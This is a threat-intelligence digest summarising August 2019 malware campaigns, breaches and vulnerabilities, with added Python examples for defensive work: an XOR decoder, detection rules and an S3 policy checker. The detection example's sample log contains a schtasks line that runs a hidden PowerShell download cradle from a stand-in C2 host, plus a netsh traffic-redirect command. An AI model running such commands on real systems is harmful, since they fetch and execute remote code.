Silobreaker Daily Cyber Digest – 02 August 2019
DealPly Adware prolongs life by abusing Microsoft and McAfee reputation service
- enSilo researchers detected a DealPly variant that queries the Microsoft SmartScreen and McAfee WebAdvisor reputation services. The researchers suspect that DealPly uses these lookups to check whether any of its variants or download sites have been compromised, so that the malware authors can generate new samples when required.
- DealPly is most commonly delivered through legitimate software installers. The malware also contains modular code, machine fingerprinting, VM detection techniques, and more.
Source (Includes IOCs)
New SystemBC proxy malware delivered in Fallout and RIG exploit kits
- On June 4th, 2019, researchers at Proofpoint discovered SystemBC malware being deployed in a Fallout EK campaign. Two days later the malware was again identified, this time in a Fallout EK and PowerEnum campaign. The malware was spotted for a third time between July 18th and July 22nd, 2019, being distributed in a RIG EK campaign.
- SystemBC is proxy malware written in C++; its principal function is to establish SOCKS5 proxies on a target machine. Threat actors can use SOCKS5 proxies to hide malicious traffic associated with other malware, such as the Danabot banking trojan. SystemBC also encrypts important strings, such as C2 server addresses and port numbers, with a 40-byte XOR key.
- The researchers stated that SystemBC, when used in conjunction with mainstream malware, would prove to be challenging for those who rely on network edge detections.
Source (Includes IOCs)
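Repeating-key XOR of the kind the SystemBC item describes is trivially reversible once the key is recovered from the sample, so the analyst's job is mostly to decode the blob and pull the C2 host and port out of it. The following is an added example written for this digest, not Proofpoint's tooling or SystemBC code; the 40-byte key and the config blob are constructed inline (the key is derived from a fixed string purely so the sample is reproducible), and the NUL-separated field layout and the host:port field shape are assumptions.

```python
"""Repeating-key XOR decoding for triage of obscured malware config strings.

Added example for the SystemBC item above; the sample key and blob are
constructed here and are not real SystemBC data.
"""
import hashlib
import re
from typing import List, Tuple

KEY_LEN = 40  # the report describes a 40-byte XOR key; the key bytes below are made up


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the key, repeating the key (XOR is its own inverse)."""
    if not key:
        raise ValueError("key must be non-empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_config(blob: bytes, key: bytes) -> List[str]:
    """Decode a XOR-obscured blob and split it into NUL-terminated printable ASCII fields.

    Fields that do not decode to printable ASCII are dropped, which doubles as the
    quickest sanity check that the key (or the key alignment) is right."""
    plain = xor_with_key(blob, key)
    fields: List[str] = []
    for raw in plain.split(b"\x00"):
        if not raw:
            continue
        try:
            text = raw.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            fields.append(text)
    return fields


HOST_PORT = re.compile(r"^(?P<host>[A-Za-z0-9.-]+):(?P<port>\d{1,5})$")


def extract_c2(fields: List[str]) -> List[Tuple[str, int]]:
    """Pick out host:port fields, the shape a proxy C2 address and port take in a config."""
    found: List[Tuple[str, int]] = []
    for field in fields:
        m = HOST_PORT.match(field)
        if m and 0 < int(m.group("port")) <= 65535:
            found.append((m.group("host"), int(m.group("port"))))
    return found


# Constructed sample: derive a fixed 40-byte key and obscure a made-up config with it.
SAMPLE_KEY = hashlib.sha512(b"constructed sample key").digest()[:KEY_LEN]
SAMPLE_PLAINTEXT = b"c2.example.invalid:4044\x00backup.example.invalid:443\x00SOCKS5\x00"
SAMPLE_BLOB = xor_with_key(SAMPLE_PLAINTEXT, SAMPLE_KEY)

if __name__ == "__main__":
    fields = decode_config(SAMPLE_BLOB, SAMPLE_KEY)
    print("decoded fields:", fields)
    for host, port in extract_c2(fields):
        print(f"candidate C2: {host}:{port}")
```

Because the sample plaintext is longer than 40 bytes, the decoder exercises the key wrap-around; with a wrong key the printable-ASCII filter drops most fields, which is the cue to re-examine where the key was pulled from.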
Amavaldo malware is one of ten new banking trojan families targeting Latin America
- ESET researchers analysed banking trojans used in Latin America. They found that Latin American banking trojans often share common features, such as being written in Delphi, containing backdoors, using social engineering tactics, employing long distribution chains, targeting Spanish- or Portuguese-speaking countries, and more. Distinct malware families could be told apart by differences in string storage, C2 addresses, and code patterns.
- The researchers analysed one of these families, dubbed Amavaldo. Detected in Brazil and Mexico, the malware is distributed through MSI installers that the victim believes will install an Adobe product. The malware collects information on the computer’s OS and detects any installed banking protection. This information is sent back to the attacker via the SecureBridge Delphi library.
- Amavaldo can log keystrokes, take screenshots, access webcams, self-update, and more. Additionally, when banking-related windows are open on a user’s device, the malware takes a screenshot of the desktop and displays it as the victim’s wallpaper. A fake pop-up window is then spawned, which the user is forced to interact with.
Source (Includes IOCs)
Cryptomining Lemon_Duck malware uses Eternalblue to spread across networks
- Researchers at SentinelOne discovered Lemon_Duck malware using the Eternalblue exploit and PowerSploit tools. The initial infection vector is lateral movement via an Eternalblue exploit. Following infection, a fileless attack executes commands that reconfigure the firewall to redirect network traffic and create a scheduled task that downloads a file from the attacker’s server.
- The final payload allows the attacker to collect system details such as the computer’s name, MAC address, bit architecture, and more. This data is sent to the C2 so that the relevant module can be downloaded. The malware also downloads files that give the attacker escalated privileges, support credential-stealing features and allow further propagation by exploiting Eternalblue.
Source (Includes IOCs)
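The two post-infection steps the Lemon_Duck item names, a firewall reconfiguration that redirects traffic and a scheduled task that fetches a file from a remote server, both show up as process-creation events, which is where a detection engineer would look for them. The following is an added example written for this digest, not SentinelOne's detection logic or real Lemon_Duck telemetry: the `proc=... cmd=...` record format and every sample command line are constructed, and the exact netsh and schtasks invocations are assumed shapes of the reported behaviour rather than strings taken from the malware.

```python
"""Process-creation triage rules for the Lemon_Duck post-infection steps described above.

Added example; the log format and command lines are constructed for illustration and are
not SentinelOne's detections or real Lemon_Duck telemetry.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Finding:
    rule: str
    process: str
    cmdline: str


# Each rule is (name, pattern over the lower-cased command line). They encode the two
# behaviours the report calls out: traffic redirection / firewall changes via netsh, and a
# scheduled task that pulls a file from a remote server, plus the hidden PowerShell cradle
# such tasks typically wrap.
RULES: List[Tuple[str, re.Pattern]] = [
    ("netsh_portproxy", re.compile(r"\bnetsh\b.*\binterface\b.*\bportproxy\b.*\badd\b")),
    ("netsh_firewall_rule", re.compile(r"\bnetsh\b.*\b(advfirewall|firewall)\b.*\badd\b")),
    ("schtasks_download_task",
     re.compile(r"\bschtasks\b.*/create\b.*(downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin)")),
    ("powershell_hidden_cradle", re.compile(r"\bpowershell\b.*(-w(indowstyle)?\s+hidden|-enc\w*\s+)")),
]

LINE_RE = re.compile(r"proc=(\S+)\s+cmd=(.*)$")


def parse_line(line: str) -> Optional[Tuple[str, str]]:
    """Parse a 'proc=<image> cmd=<command line>' record (constructed format) into its parts."""
    m = LINE_RE.match(line.strip())
    return (m.group(1), m.group(2)) if m else None


def scan(lines: List[str]) -> List[Finding]:
    """Run every rule over every parsable line; one line can trigger more than one rule."""
    findings: List[Finding] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, cmd = parsed
        lowered = cmd.lower()
        for name, pattern in RULES:
            if pattern.search(lowered):
                findings.append(Finding(name, proc, cmd))
    return findings


def rules_hit(lines: List[str]) -> List[str]:
    """Sorted list of the rule names that fired, for a quick summary."""
    return sorted(f.rule for f in scan(lines))


# Constructed sample telemetry: two benign lines and three modelled on the reported behaviour.
SAMPLE_LOG = [
    "proc=svchost.exe cmd=svchost.exe -k netsvcs",
    "proc=powershell.exe cmd=powershell.exe -NoProfile -Command Get-Process",
    "proc=netsh.exe cmd=netsh interface portproxy add v4tov4 listenport=65531 "
    "connectaddress=198.51.100.7 connectport=80",
    'proc=netsh.exe cmd=netsh advfirewall firewall add rule name="update" dir=in action=allow '
    "protocol=TCP localport=65531",
    'proc=schtasks.exe cmd=schtasks /create /sc minute /mo 30 /tn "\\Microsoft\\Windows\\Rac" '
    "/tr \"powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.jsp')\"",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.rule}] {f.process}: {f.cmdline}")
```

The schtasks line fires two rules (the task creation and the hidden PowerShell download cradle inside its `/tr` argument), which is deliberate: stacking several weak signals on one event is what separates this behaviour from routine administration, where netsh and schtasks are common on their own.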
New malware targets US utilities sector
- Proofpoint researchers discovered new malware, dubbed LookBack, used in a spear phishing campaign against three US companies operating in the utilities sector. Given the overlap with historical campaigns and macros, the researchers believe a state-sponsored APT is behind the attacks. Analysts noted a similarity between the macros used in this campaign and those in older APT campaigns targeting Japanese companies in 2018.
- The US companies were targeted between July 19th and July 25th, 2019, via fake emails with attachments supposedly containing examination results from the National Council of Examiners for Engineering and Surveying. Once the attachment is opened, malicious macros contained in the document install and execute LookBack.
- LookBack consists of a remote access trojan module and a proxy mechanism for C2 communication. It is capable of enumerating services, viewing processes, system and file data, deleting files, executing commands, taking screenshots, controlling the mouse, rebooting the machine and deleting itself from an infected host.
Source (Includes IOCs)
Same actor believed to be behind Synology and QNAP NAS ransomware attacks
- Researchers at Anomali analysed the recent brute force attacks attempting to deploy ransomware on Synology Network Attached Storage (NAS) devices. They believe the actor is the same as the one behind the recent eCh0raix ransomware attacks on QNAP NAS devices. The researchers found similarities in the code, ransom amount and shared strings.
- According to the researchers, the threat actor is likely to continue such activity, since NAS devices offer a large target pool, as well as more leverage, due to many companies and individuals using NAS devices for final backups.
Cobalt Group targets Kazakh bank
- Check Point Research discovered a Cobalt Group campaign that targeted Kassa Nova bank customers with a malicious document hosted on the bank’s own website. The bank successfully remediated the attack after detection.
- The malicious files contained valid certificates and Kassa Nova’s official logo, tricking victims into running embedded macros. This starts a multi-stage infection chain that eventually executes a Cobalt Strike beacon.
- Check Point Research attributed the attack to Cobalt Group, as it contained many overlaps in TTPs, targets and other technical aspects. Researchers also pointed out that this attack indicates that despite the earlier arrest of Cobalt Group’s leader, the group continues to expand its toolset and range of targets.
Source (Includes IOCs)
McAfee publish analysis of Clop Ransomware
- Researchers at McAfee stated that Clop Ransomware continues to be updated by cybercriminals since its initial discovery on February 8th, 2019.
- Characteristics of the ransomware show that enterprises, rather than consumers, are the intended target, and it is calibrated to avoid computers running Russian or other languages spoken in the Commonwealth of Independent States. McAfee detection data showed the ransomware overwhelmingly targeting devices in the US.
- A second version of Clop was detected at the end of February which featured updates to elements of code, and contained a new ransom note with clearer instructions. The researchers concluded that Clop is a constantly evolving threat.
Source (Includes IOCs)
Researchers warn about uptick in client-side credit card theft
- Researchers at Malwarebytes Labs have observed an increase in the number of blocked exfiltration gates and skimmer domains, with peak detections occurring on July 4th, 2019.
- During July 2019, Malwarebytes detected and blocked over 65,000 attempts of credit card theft by Magecart, of which 69.2 percent targeted shoppers in North America.
- Malwarebytes Labs advise that organisations must implement a patching, hardening and mitigation cycle to prevent initial compromise or re-infection.
Industrial control systems entities targeted by new threat actor
- Researchers at Dragos discovered a new threat actor, called Hexane, targeting industrial oil and gas companies in the Middle East, with a strong focus on Kuwait. The group appears to have been active since at least mid-2018, accelerating its activity in early to mid-2019.
- Hexane has also targeted telecommunication providers in the greater Middle East, Central Asia, and Africa.
- Similarities were found between the behaviours and tactics, techniques and procedures (TTPs) of Hexane and those of APT33 and APT34, all of which target industrial control system entities, focusing mainly on oil and gas.
Palo Alto Networks publish analysis of Rocke hacking group’s TTPs
- Palo Alto Networks researchers found that the so-called Rocke group often exploits vulnerabilities dating back to 2016 and 2017 to download backdoors, subsequently delivering multiple payloads to gain administrative access to cloud systems. With administrative access, Rocke can kill off rivals’ miners and install its own Monero mining software.
- NetFlow data analysed between December 2018 and June 16th, 2019, showed that 28.1% of the cloud environments surveyed by the researchers had at least one fully established network connection with at least one Rocke C2.
- The researchers also discovered that Rocke was using Godlua malware and had added a DoS function and Lua switch functionality to its toolkit.
Leaks and Breaches
Librería Porrúa breach exposes 2.1 million customer records
- Despite having been notified of an exposed MongoDB database, the Mexico-based bookseller Librería Porrúa failed to take the database offline before hackers gained access. The hackers then proceeded to wipe the database and demand a ransom. It is unclear whether the company paid the ransom.
- The exposed data included 1.2 million purchase records and 958,000 personal data records, including full names, dates of birth, email addresses, phone numbers and more. It is unclear how many users were affected.
Sephora customer data potentially found on dark web
- Group-IB found two databases containing customer data for sale on the dark web, which are likely related to Sephora. Sephora had previously stated it does not believe any personal data was misused.
- The first database includes 500,000 records, including usernames and hashed passwords. The second database contains 3.2 million records and was originally leaked in March 2019. Data includes names, genders, ethnicities, logins, encrypted passwords, dates of registration and last activity, IP of registration and more.
- Group-IB advises customers to change their passwords and warns that, although no payment information is included in the records, the data present can easily be used for social engineering or targeted phishing attacks.
Over 1 million South Korean CP records for sale on dark web
- Gemini Advisory found a sharp rise in the number of South Korean-issued Card Present (CP) records available on the dark web, with over 1 million compromised records posted for sale since May 29th, 2019. CP records are often obtained by installing malware on systems with point-of-sale (POS) devices or by using skimmers and overlays at ATMs or POS terminals.
- It is unclear where the data was obtained from. The records could have been obtained via a breach in a parent company, allowing threat actors access to multiple merchants and POS terminals. Another possibility is that a POS integrator was breached, enabling threat actors to gain access to payment data from multiple sources.
Unsecured Bank of Cardiff Amazon S3 bucket exposes private conversations
- The California-based Bank of Cardiff exposed over 1 million audio recordings of phone calls in an unsecured Amazon S3 bucket. Some of the exposed files have since been secured; however, many audio clips remain available to download.
- A large amount of recordings date from 2015 to 2017 and many of the calls involve discussions about loans. Some also include named employees reading out their phone numbers.
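An open S3 bucket of the kind in the Bank of Cardiff item is usually the result of a bucket policy (or ACL) that grants a read action to an anonymous principal, and the first thing a reviewer wants is a way to spot that grant and to know whether the bucket's Block Public Access settings neutralise it. The following is an added example written for this digest, not the bank's configuration or an AWS tool: the bucket name, policies and IAM role ARN are constructed, and the evaluator is deliberately simplified (it ignores ACLs, account-level settings and the contents of Condition blocks, which a complete review would also have to consider).

```python
"""Triage an S3 bucket policy for anonymous read grants, the misconfiguration class
behind the exposed-bucket story above.

Added example; the policies and role ARN are constructed and do not describe the bank's
actual setup. Simplified evaluator: ACLs, account-level settings and Condition blocks
are out of scope here.
"""
import json
from typing import Any, Dict, List

# Actions that grant object or listing reads to whoever the statement's Principal is.
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:get*", "s3:*", "*"}


def _as_list(value: Any) -> List[Any]:
    """Policy fields may be a single value or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def is_anonymous_principal(principal: Any) -> bool:
    """True for Principal "*" or {"AWS": "*"}, the two spellings that mean 'anyone'."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_read_statements(policy: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return Allow statements that give an anonymous principal a read action unconditionally."""
    hits: List[Dict[str, Any]] = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not is_anonymous_principal(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue  # conditioned grants (e.g. VPC-endpoint-only) need manual review
        actions = {a.lower() for a in _as_list(stmt.get("Action", []))}
        if actions & READ_ACTIONS:
            hits.append(stmt)
    return hits


def assess_bucket(policy_json: str, public_access_block: Dict[str, bool]) -> Dict[str, Any]:
    """Combine the policy findings with the bucket's Block Public Access settings.

    Only RestrictPublicBuckets neutralises an already-attached public policy;
    BlockPublicPolicy merely rejects new public policies at PUT time."""
    policy = json.loads(policy_json)
    hits = public_read_statements(policy)
    restricted = bool(public_access_block.get("RestrictPublicBuckets", False))
    return {
        "public_read_statement_ids": [s.get("Sid", "<no Sid>") for s in hits],
        "effectively_public": bool(hits) and not restricted,
    }


# Constructed sample policies on a made-up bucket name.
LEAKY_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject"],
        "Resource": "arn:aws:s3:::call-recordings-example/*",
    }],
})

HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AuditRoleRead",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/CallAuditRole"},  # hypothetical role
        "Action": ["s3:GetObject"],
        "Resource": "arn:aws:s3:::call-recordings-example/*",
    }],
})

if __name__ == "__main__":
    print("leaky:   ", assess_bucket(LEAKY_POLICY, {}))
    print("hardened:", assess_bucket(HARDENED_POLICY, {"RestrictPublicBuckets": True}))
```

The distinction drawn in `assess_bucket` matters in practice: turning on BlockPublicPolicy after the fact stops someone re-attaching a public policy but leaves an existing one in force, so a bucket that has already been open needs the policy itself removed or RestrictPublicBuckets enabled.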
Chilean voter records leaked online
- The data of 14,308,151 Chileans has been exposed online as the result of an unsecured Elasticsearch database. Information within the database included names, addresses, ages, and tax ID numbers, and has been confirmed as valid by ZDNet and Chile’s Electoral Service. However, the Electoral Service denies that it owns the server, stating that the data was probably scraped from its official website and later assembled into databases by a third party.
- The leaky server is still online as of August 2nd, 2019.
Data leaks affect two Indian financial services sites
- vpnMentor found unencrypted and unsecured databases belonging to Credit Fair and Chqbook on July 24th, 2019. Chqbook has since closed its leak; however, Credit Fair’s database remains open.
- A total of 44,000 records were exposed in the Credit Fair database, whereas the Chqbook database contained 67GB of data. Exposed data includes full names, phone numbers, addresses, email addresses, credit card numbers and more.
- The data leak risks exposing clients to identity fraud, account takeovers, phishing attacks, blackmail, extortion and physical threats, such as household robberies.
iPhone’s AirDrop feature can leak phone numbers
- Researchers at Hexway found that when Bluetooth is on, an iPhone broadcasts its status constantly, allowing those nearby to acquire information about the device’s battery, name, OS version and more.
- AirDrop broadcasts a SHA256 hash of the user’s phone number to all nearby devices whenever ‘Share’ is used. An attacker could acquire and recover phone numbers from these hashes by matching them to a database of hashed phone numbers corresponding to the user’s region.
- During Wi-Fi password sharing, partial hashes of an iPhone user’s phone number, AppleID and email are requested via Bluetooth. It is possible to trigger “Share Wi-Fi password” messages in order to acquire this data.
- Hexway notes that these issues are ‘more a feature of the work of the ecosystem than a vulnerability’. iOS 10.3.1 onwards, on iPhone 6 and above, displays this behaviour.
Vulnerabilities discovered in Hickory Smart Device Ecosystem
- Six flaws were discovered in the Hickory Smart device ecosystem, with four of them being assigned CVEs. CVE-2019-5632 and CVE-2019-5633 are both insecure data storage issues, in the Hickory Android and iOS applications respectively, that could allow an attacker to read, modify and delete sensitive information. CVE-2019-5634 refers to the inclusion of the same sensitive data in the Android application’s log files.
- CVE-2019-5635 is a data exposure issue. Sensitive information is transmitted as cleartext between clients and the MQTT server. The two vulnerabilities lacking identifiers are cleartext data transmission issues in the Web API, which could allow an attacker to easily sniff the contents.
- The vulnerabilities were responsibly disclosed to Hickory Hardware and Delphian Systems, as well as CERT/CC, but the public disclosure deadline has since expired. Rapid7 has stated that the vendor has not acknowledged any of the vulnerabilities or offered any updates to remedy them.
XSS vulnerability found in WordPress Shopify plugin
- The plugin has been temporarily removed from the WordPress repository until a patch is released.
Seven vulnerabilities detected in LiveZilla Live Chat Software
- Fortinet researchers reported seven vulnerabilities in Live Chat, the Next Generation Live Help and Live Support System version 184.108.40.206 and prior. The vulnerabilities, which ranged from critical to medium severity, could all be attributed to a lack of trivial input sanitization.
- The researchers reported the vulnerabilities to LiveZilla, starting from June 22nd, 2019. The flaws have all been addressed by patch 220.127.116.11 which was released on July 23rd, 2019. A technical run through of the vulnerabilities is available via Fortinet.
Empire post-exploitation framework no longer maintained
- Developer Chris Ross announced on July 31st, 2019, that the project had fulfilled its original purpose of showing PowerShell exploit capabilities and raising awareness of the potential for PowerShell to be used maliciously; consequently, he stated that Empire would be discontinued.
- Since its release in 2015 Empire has been used by offensive security teams and hackers. Notable users include the APT group Hades and the criminal group FIN7.
Californian city confirms it was hit with ransomware
- Lodi City’s computer systems were infected in April and May 2019, with attackers demanding a 75 BTC ransom. The infection vector was an email, and primary targets were phone lines and financial data systems.
- Initial attempts to fix the issue succeeded, but Lodi Police Department was subsequently compromised. The city did not pay the ransom, instead electing to restore their systems from back-ups.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.